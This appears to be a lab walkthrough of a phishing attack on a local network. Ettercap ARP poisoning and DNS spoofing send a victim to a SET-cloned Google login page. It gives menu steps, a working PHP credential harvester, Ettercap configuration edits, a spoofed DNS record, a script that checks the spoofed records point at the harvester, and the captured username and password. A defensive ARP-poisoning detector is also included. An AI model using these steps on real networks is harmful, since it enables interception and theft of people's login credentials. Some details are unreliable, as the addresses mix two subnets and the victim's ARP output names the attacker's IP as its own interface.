
Sniffing - DNS - Ettercap.dns

 

                 Victim system                 Attacker system
OS               Windows 7 SP1 (VMware)        Kali Linux 2019 (VMware)
IP address       192.168.111.80                192.168.111.100
NIC              NAT                           NAT

Both VMs sit on the same VMware NAT network, so the attacker can poison the victim's ARP entry for the NAT gateway and sit in the path of its DNS queries. Note that the Ettercap host list and the etter.dns entry further down were captured on a 192.168.58.0/24 lab; substitute the addresses from this table when reproducing the steps.

On Kali Linux 2019

Verify the IP address of the attacker interface (it must be the address the cloned page and the spoofed DNS record will point at):

root@kali ~# ip address show eth0

 

Run setoolkit and walk through the menus:

root@kali ~# setoolkit
1) Social-Engineering Attacks
2) Website Attack Vectors
3) Credential Harvester Attack Method
1) Web Templates

When SET asks for the address for the POST back (the address the cloned form submits to and the harvester listens on), enter the Kali Linux IP address:
192.168.111.100

Choose template number 2:
2. Google

 

 

Open another terminal.

Edit post.php, the script the cloned login form posts to, with vi. This version appends every submitted field to a text file and then bounces the browser to the real site:

# vi /var/www/html/post.php

<?php
// Append every field of the submitted login form to a text file.
// The path is relative, so the file lands next to this script in the
// Apache web root (/var/www/html) and is served to anyone who requests it.
$file = 'harvester_2019.txt';
file_put_contents($file, print_r($_POST, true), FILE_APPEND);
?>
<!-- Immediately send the browser on to the real site so the victim sees a normal login page -->
<meta http-equiv="refresh" content="0; url=https://www.google.com" />

Because the harvested file sits inside the web root, anyone who can reach the Kali web server can download it; in a real engagement write it outside the document root.

 


Modify etter.conf so that Ettercap keeps root privileges after startup (by default it drops to nobody, uid/gid 65534, and then cannot run the iptables redirect commands):

# vi /etc/ettercap/etter.conf

Change both the user and the group to 0 (the original write-up repeated the ec_gid line; the first line is ec_uid):

ec_uid = 0                # nobody is the default
ec_gid = 0                # nobody is the default

Then uncomment the two iptables lines under "if you use iptables":

# if you use iptables:
   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

 

 

Add the spoofed record to etter.dns so that the dns_spoof plugin answers queries for Google's Korean domain with the address of the Kali host, where the harvester is listening. The original screenshot shows 192.168.58.200, from the lab on the other subnet; for the lab in the table above the record must point at 192.168.111.100:

# vi /etc/ettercap/etter.dns

*.google.co.kr  A       192.168.111.100

The wildcard covers www.google.co.kr and other subdomains but not the bare google.co.kr; the stock file lists both forms (for example microsoft.com and *.microsoft.com) when both should be hijacked.
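The following Python script is an added example and is not from the original post or from the Ettercap project. It parses etter.dns entries and checks two things a practitioner wants to know before starting the attack: which query names a rule set would actually answer, and whether every A rule points at the attacker host where the harvester listens (the 192.168.58.200 versus 192.168.111.100 mismatch above is exactly what it catches). It assumes Ettercap's `*` wildcard behaves like a shell glob (fnmatch); the sample rules embedded in it are constructed for the demonstration.

```python
import fnmatch
import ipaddress
from typing import Dict, List, NamedTuple, Optional, Tuple


class DnsRule(NamedTuple):
    name: str    # pattern from etter.dns, may contain '*'
    rtype: str   # record type: A, AAAA, PTR, MX, ...
    target: str  # address (or name) the dns_spoof plugin answers with


def parse_etter_dns(text: str) -> List[DnsRule]:
    """Parse the etter.dns format: '<name> <type> <target> [ttl]' per line,
    '#' starts a comment, blank lines are ignored."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if len(fields) < 3:
            raise ValueError(f"malformed etter.dns line: {raw!r}")
        rules.append(DnsRule(fields[0].lower().rstrip("."), fields[1].upper(), fields[2]))
    return rules


def matching_rule(rules: List[DnsRule], qname: str, rtype: str = "A") -> Optional[DnsRule]:
    """First rule that would answer a query for qname/rtype.
    Assumption: '*' is glob-like (fnmatch), so '*.google.co.kr' covers
    www.google.co.kr but not the bare google.co.kr."""
    qname = qname.rstrip(".").lower()
    for rule in rules:
        if rule.rtype == rtype and fnmatch.fnmatchcase(qname, rule.name):
            return rule
    return None


def rules_not_pointing_at(rules: List[DnsRule], attacker_ip: str) -> List[DnsRule]:
    """A rules whose target is not the attacker's address. Such a rule sends
    the victim to a host where no harvester is listening."""
    attacker = ipaddress.ip_address(attacker_ip)
    wrong = []
    for rule in rules:
        if rule.rtype != "A":
            continue
        try:
            if ipaddress.ip_address(rule.target) != attacker:
                wrong.append(rule)
        except ValueError:            # target is not an IP literal at all
            wrong.append(rule)
    return wrong


# Constructed sample rule set (not the stock etter.dns): the write-up's
# wildcard line with its mismatched address, plus a bare-domain line that
# points at the Kali host from the lab table.
SAMPLE_ETTER_DNS = """\
# constructed for this example
*.google.co.kr  A   192.168.58.200     # wrong subnet for the 192.168.111.0/24 lab
google.co.kr    A   192.168.111.100
"""


def audit(text: str, attacker_ip: str,
          probe_names=("www.google.co.kr", "google.co.kr", "www.google.com")
          ) -> Tuple[Dict[str, Optional[str]], List[DnsRule]]:
    """Which probe names get hijacked (and to where), and which A rules
    miss the attacker host."""
    rules = parse_etter_dns(text)
    hijacked = {}
    for name in probe_names:
        rule = matching_rule(rules, name)
        hijacked[name] = rule.target if rule else None
    return hijacked, rules_not_pointing_at(rules, attacker_ip)


if __name__ == "__main__":
    hijacked, wrong = audit(SAMPLE_ETTER_DNS, "192.168.111.100")
    for name, target in hijacked.items():
        print(f"{name:<20} -> {target or 'not spoofed (real answer passes through)'}")
    for rule in wrong:
        print(f"rule '{rule.name}' points at {rule.target}, not at the harvester host")
```

Run it against your real /etc/ettercap/etter.dns by passing the file contents to audit() with the attacker address from ip address show eth0; any rule it lists under the second return value will redirect victims somewhere other than the cloned page.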

 

Start Ettercap in graphical mode:

 # ettercap -G

Sniff > Unified sniffing > eth0

Hosts > Scan for hosts
Hosts > Hosts list

Add the victim as target 1 and the gateway as target 2. This screenshot comes from the 192.168.58.0/24 lab; on the lab in the table above the victim is 192.168.111.80 and the gateway is the VMware NAT gateway 192.168.111.2:

192.168.58.100 (Victim) > Add to Target 1

192.168.58.254 (Gateway) > Add to Target 2

Mitm > ARP poisoning > Sniff remote connections

With the victim-gateway traffic now passing through Kali in both directions, enable the plugin that rewrites DNS answers according to etter.dns:

Plugins > Manage the plugins > dns_spoof (double click)

 

 

On the victim

C:\Users\Administrator>arp -a

Interface: 192.168.111.100 --- 0xb
  Internet Address      Physical Address      Type
  192.168.111.53        50-b7-c3-a6-1f-05     dynamic
  192.168.111.100       00-0c-29-a6-b1-72     dynamic
  192.168.111.2         00-0c-29-a6-b1-72     dynamic

The poisoning is visible right here: the NAT gateway 192.168.111.2 and the Kali host 192.168.111.100 show the same MAC address, 00-0c-29-a6-b1-72, so every frame the victim sends to its gateway (including its DNS queries) now goes to Kali. One MAC behind two IP addresses, or a gateway MAC that differs from its usual value, is the indicator that tools such as arpwatch and switch-side dynamic ARP inspection report.
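As an added check that is not part of the original post: the duplicate MAC in the victim's ARP table is what a defender looks for. This Python script parses Windows arp -a output (the entry lines have the same shape whether the column headers are printed in Korean or English, so it keys on the IP/MAC pattern and ignores headers), reports unicast MACs that answer for more than one IP, lists the IPs that collide with the gateway, and compares the gateway's MAC with a recorded baseline. The sample table and the baseline gateway MAC are constructed for the example.

```python
import re
from collections import defaultdict
from typing import Dict, List, NamedTuple, Optional


class ArpEntry(NamedTuple):
    ip: str
    mac: str   # normalised to lower-case, dash-separated
    kind: str  # the type column as printed ('dynamic', '동적', 'static', ...)


# An entry line of Windows 'arp -a': IPv4, MAC in aa-bb-cc-dd-ee-ff form, type word.
# Header lines ('Interface: ...' / column names) never match, whatever their language.
ARP_LINE = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-fA-F]{2}(?:-[0-9a-fA-F]{2}){5})\s+(\S+)"
)


def parse_arp_table(text: str) -> List[ArpEntry]:
    """Parse 'arp -a' output into entries, normalising MACs to lower case."""
    entries = []
    for line in text.splitlines():
        m = ARP_LINE.match(line)
        if m:
            entries.append(ArpEntry(m.group(1), m.group(2).lower(), m.group(3)))
    return entries


def is_group_mac(mac: str) -> bool:
    """Broadcast/multicast MACs have the I/G bit (LSB of the first octet) set;
    they legitimately map to many IPs and must not be reported."""
    return int(mac.split("-")[0], 16) & 1 == 1


def macs_with_multiple_ips(entries: List[ArpEntry]) -> Dict[str, List[str]]:
    """Unicast MACs that appear behind more than one IP address: two hosts
    sharing one NIC's MAC is the classic footprint of ARP cache poisoning."""
    by_mac: Dict[str, List[str]] = defaultdict(list)
    for e in entries:
        if not is_group_mac(e.mac):
            by_mac[e.mac].append(e.ip)
    return {mac: ips for mac, ips in by_mac.items() if len(ips) > 1}


def gateway_conflicts(entries: List[ArpEntry], gateway_ip: str) -> List[str]:
    """Other IPs that currently share the gateway's MAC; an attacker host
    impersonating the gateway shows up here."""
    gw_mac = next((e.mac for e in entries if e.ip == gateway_ip), None)
    if gw_mac is None:
        return []
    return [e.ip for e in entries if e.mac == gw_mac and e.ip != gateway_ip]


def gateway_mac_changed(entries: List[ArpEntry], gateway_ip: str,
                        baseline_mac: str) -> Optional[bool]:
    """True if the gateway's MAC differs from the recorded baseline,
    None if the gateway is not in the table at all."""
    gw_mac = next((e.mac for e in entries if e.ip == gateway_ip), None)
    if gw_mac is None:
        return None
    return gw_mac != baseline_mac.lower().replace(":", "-")


# Constructed sample modelled on the victim's table in the write-up:
# the Kali host (.100) and the NAT gateway (.2) share one VMware MAC.
SAMPLE_ARP = """\
Interface: 192.168.111.80 --- 0xb
  Internet Address      Physical Address      Type
  192.168.111.2         00-0c-29-a6-b1-72     dynamic
  192.168.111.53        50-b7-c3-a6-1f-05     dynamic
  192.168.111.100       00-0c-29-a6-b1-72     dynamic
  192.168.111.255       ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

# Assumed baseline (constructed): the gateway's MAC recorded before the attack.
GATEWAY_IP = "192.168.111.2"
BASELINE_GATEWAY_MAC = "00-50-56-e9-00-02"


if __name__ == "__main__":
    table = parse_arp_table(SAMPLE_ARP)
    for mac, ips in macs_with_multiple_ips(table).items():
        print(f"MAC {mac} answers for {', '.join(ips)}")
    conflicts = gateway_conflicts(table, GATEWAY_IP)
    if conflicts:
        print(f"gateway {GATEWAY_IP} shares its MAC with {', '.join(conflicts)}")
    if gateway_mac_changed(table, GATEWAY_IP, BASELINE_GATEWAY_MAC):
        print("gateway MAC differs from baseline: possible ARP poisoning")
```

Feed it the text of arp -a taken from the victim (or a scheduled capture of it); in an environment where the gateway MAC is known, gateway_mac_changed() is the cheaper and more specific test, while macs_with_multiple_ips() needs no baseline at all.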

 

Flush the victim's DNS cache so the next lookup goes out on the wire (and receives the spoofed answer), then open the site from a command prompt:

C:\Users\Administrator>ipconfig /flushdns

C:\Users\Administrator>start http://www.google.co.kr

A quick check before launching the browser is nslookup www.google.co.kr, which should now return the Kali address. The request must be plain http://: dns_spoof only changes the address, it provides no valid certificate for the cloned page, so a browser that already holds an HSTS entry for the domain will insist on HTTPS and fail instead of showing the clone.

 

 

Back on the Kali Linux console. As soon as the victim submits the cloned login form, SET prints the POST fields, Email and Passwd included:

('Array\n',)
('(\n',)
('    [GALX] => SJLCkfgaqoM\n',)
('    [continue] => https://accounts.google.com/o/oauth2/auth?zt=ChRsWFBwd2JmV1hIcDhtUFdldzBENhIfVWsxSTdNLW9MdThibW1TMFQzVUZFc1BBaURuWmlRSQ%E2%88%99APsBz4gAAAAAUy4_qD7Hbfz38w8kxnaNouLcRiD3YTjX\n',)
('    [service] => lso\n',)
('    [dsh] => -7381887106725792428\n',)
('    [_utf8] => \xe2\x98\x83\n',)
('    [bgresponse] => js_disabled\n',)
('    [pstMsg] => 1\n',)
('    [dnConn] => \n',)
('    [checkConnection] => \n',)
('    [checkedDomains] => youtube\n',)
('    [Email] => SaveTheEarth\n',)
('    [Passwd] => weacnmadeit!s\n',)
('    [signIn] => Sign in\n',)
('    [PersistentCookie] => yes\n',)
(')\n',)
 

 

The captured fields are also written to a timestamped harvester file in the Apache web root (this is SET's own log; the post.php above writes its copy to harvester_2019.txt alongside it):

root@kali:/var/www/html# cat harvester_2017-09-22\ 20\:39\:55.034333.txt
Array
(
    [GALX] => SJLCkfgaqoM
    [continue] => https://accounts.google.com/o/oauth2/auth?zt=ChRsWFBwd2JmV1hIcDhtUFdldzBENhIfVWsxSTdNLW9MdThibW1TMFQzVUZFc1BBaURuWmlRSQ%E2%88%99APsBz4gAAAAAUy4_qD7Hbfz38w8kxnaNouLcRiD3YTjX
    [service] => lso
    [dsh] => -7381887106725792428
    [_utf8] => ☃
    [bgresponse] => js_disabled
    [pstMsg] => 1
    [dnConn] =>
    [checkConnection] =>
    [checkedDomains] => youtube
    [Email] => SaveTheEarth
    [Passwd] => weacnmadeit!s
    [signIn] => Sign in
    [PersistentCookie] => yes
)